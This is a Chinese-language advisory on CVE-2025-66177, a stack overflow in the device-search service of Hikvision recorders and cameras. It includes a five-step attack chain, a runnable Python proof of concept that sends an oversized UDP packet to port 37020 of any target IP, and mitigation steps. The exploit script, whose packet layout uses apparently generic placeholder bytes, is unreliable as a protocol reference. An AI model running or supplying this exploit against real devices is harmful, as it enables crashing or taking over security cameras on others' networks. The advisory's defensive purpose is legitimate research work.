CVE-2025-66177 海康威视设备搜索功能栈溢出漏洞

漏洞信息

漏洞编号

CVE-2025-66177

漏洞类型

缓冲区溢出/栈溢出

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hikvision NVR/DVR/CVR/IPC

漏洞概述

CVE-2025-66177是海康威视（Hikvision）设备中发现的一个高危安全漏洞。该漏洞存在于Hikvision NVR（网络视频录像机）、DVR（数字视频录像机）、CVR（中央视频录像机）和IPC（网络摄像机）产品的设备搜索和发现功能（Device Search and Discovery feature）中。漏洞类型为栈溢出（Stack Overflow），CVSS评分高达8.8，属于高危级别。攻击者只需位于同一本地局域网（LAN）内，无需任何认证和用户交互，即可通过发送特制的恶意数据包触发该漏洞。成功利用此漏洞可导致受影响设备出现功能障碍，攻击者可能进一步实现代码执行或造成设备完全瘫痪。由于该漏洞影响海康威视多款主流安防产品，且利用条件简单，对企业安防系统构成严重威胁。

技术细节

该栈溢出漏洞位于Hikvision设备的设备搜索和发现协议处理模块中。设备搜索功能用于在局域网内发现和配置网络摄像机和录像设备，通常基于UDP协议在特定端口进行通信。漏洞成因是程序在处理接收到的设备搜索响应数据包时，未对输入数据进行充分的边界检查，将用户可控的数据直接写入栈内存。当攻击者构造超长的设备信息字段（如设备名称、IP地址、序列号等）并发送给目标设备时，栈缓冲区将被溢出，覆盖相邻的栈帧数据、返回地址和函数指针等关键内存区域。攻击者可通过精确构造溢出数据，覆盖返回地址使其指向恶意代码，从而在设备上执行任意命令。由于设备搜索功能在设备启动时即运行，且无需认证即可访问，攻击者可以在内网中直接发起攻击，无需获取任何设备凭据。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者接入目标设备的同一局域网（LAN），使用网络扫描工具（如nmap）发现海康威视设备的IP地址和设备搜索服务端口（通常为37020/UDP）

STEP 2

步骤2: 构造恶意数据包

攻击者构造包含超长设备信息字段的特制设备搜索响应数据包，超长数据用于触发栈缓冲区溢出，并精心构造溢出数据覆盖返回地址

STEP 3

步骤3: 发送攻击载荷

通过UDP协议向目标设备的设备搜索服务端口发送恶意数据包，无需任何认证即可触发漏洞

STEP 4

步骤4: 触发溢出

目标设备处理恶意数据包时，栈缓冲区被溢出数据覆盖，导致栈帧破坏和程序控制流劫持

STEP 5

步骤5: 达成攻击效果

攻击成功可导致设备崩溃（拒绝服务）或通过劫持控制流执行任意代码，完全控制受影响设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-66177 PoC - Hikvision Device Search Stack Overflow
Note: This PoC is for educational and authorized testing purposes only.
"""

import socket
import struct
import sys

def create_exploit_packet():
    """Construct malicious device search response packet"""
    # Device Search Protocol header
    header = b'\x00\x00\x00\x00'  # Protocol version
    packet_type = b'\x01\x00'       # Response packet type
    
    # Overflow payload - trigger stack overflow
    # Sending oversized device info field
    overflow_length = 2000  # Exceed buffer size
    overflow_payload = b'A' * overflow_length
    
    # Malicious return address (to be customized based on target)
    return_addr = struct.pack('<I', 0x41414141)  # Placeholder address
    
    # Construct packet with overflow data
    packet = header + packet_type
    packet += struct.pack('<H', overflow_length)  # Length field
    packet += overflow_payload + return_addr
    
    return packet

def send_exploit(target_ip, target_port=37020):
    """Send exploit packet to target device"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    exploit_packet = create_exploit_packet()
    
    try:
        print(f"[*] Sending exploit to {target_ip}:{target_port}")
        sock.sendto(exploit_packet, (target_ip, target_port))
        print(f"[+] Exploit packet sent ({len(exploit_packet)} bytes)")
        print("[!] If vulnerable, device may crash or allow code execution")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    send_exploit(sys.argv[1])

影响范围

Hikvision NVR (部分未修补版本)

Hikvision DVR (部分未修补版本)

Hikvision CVR (部分未修补版本)

Hikvision IPC (部分未修补版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）通过网络分段和VLAN隔离，将安防设备与其他业务系统分离，限制攻击面；2）在网络边界部署防火墙和IPS设备，对设备搜索服务端口（37020/UDP）的异常流量进行过滤和告警；3）监控内网设备搜索协议通信，阻断来自非授权源的设备搜索响应；4）尽可能在非业务时段重启设备，清除可能的恶意代码残留；5）联系海康威视技术支持获取具体版本补丁信息。